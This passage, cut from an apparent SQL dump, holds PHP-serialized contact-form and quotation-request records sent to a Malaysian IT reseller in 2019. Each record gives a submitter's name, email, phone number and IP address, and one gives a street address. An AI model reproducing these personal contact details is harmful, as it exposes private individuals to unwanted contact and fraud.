digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-28 23:12:49','123.136.116.129','1'),(254,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Wendy lim\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"Siewcheng82@yahoo.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60105394349\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:2:\"A9\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:61:\"Looking for model Panasonic Toughpad JB-T1.preloved or new 1.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-28 23:12:50','123.136.116.129','1'),(255,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Wendy lim\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"siewcheng82@yahoo.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0105394349\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:2:\"A9\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:61:\"Looking for model Panasonic Toughpad JB-T1.preloved or new 1.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-28 23:13:27','123.136.116.177','1'),(256,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Wendy lim\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"siewcheng82@yahoo.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0105394349\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:2:\"A9\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:61:\"Looking for model Panasonic Toughpad JB-T1.preloved or new 1.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-28 23:13:56','123.136.116.177','1'),(257,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"Clare Cinderella\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"clr.cinderella@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0135661010\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"Kenyalang Underwater Services\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:71:\"Lot 6614, Jalan Jati 2F, Taman Desa Senadin, Fasa 5, Lutong. 98000 Miri\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"TOUGHBOOK T1, TOUGHBOOK N1\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"09\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-29 20:22:57','218.208.137.136','1'),(258,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"Kenny\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"wyconsb@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0122280776\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"Wycon\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"Looking for another disk station\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"23\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-30 11:32:18','42.191.127.95','1'),(259,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Azizul Mat Arof\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"azizulmata@dhrobotic.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60183661066\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"DH Robotic and Automation\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:183:\"Hello i have inquiries for this items below: 1. Cisco switch, 24 port, L3, manageble - 6units 2. Cisco wireless 100 access point - 6units please provide best offer with details thanks\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"21\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-02 14:37:47','123.136.117.217','1'),(260,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"Khairul Afkar bin Kholiah\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"afkar@kpjlablink.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0179624546\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"Lablink (M) Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:120:\"can you quote to us for this logitech rally plus video conference kit with mounting and standard out of box installation\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"11\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-05 09:54:13','175.142.248.168','1'),(261,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"Lai Kok Yong\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"kylai@katrinbj.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0124389219\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"Katrin BJ Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:36:\"Looking for video conference system.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"38\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-05 14:48:46','175.139.255.141','1'),(262,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"Nizar Sham Hussin\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"nizar@srt-eon.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0192209651\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:35:\"SRT-EON Security Services Sdn. Bhd.\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:232:\"Salam. We&#039;re a security services company at Kelana Jaya and we&#039;re interested in video conferencing solutions. Can we have a meeting with some sort of PoC for your video conferencing solution. Please caontact me. Thank you.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"77\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-06 10:36:26','60.50.221.177','1'),(263,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"Munieyapen\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"munieyapen@leopad.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number 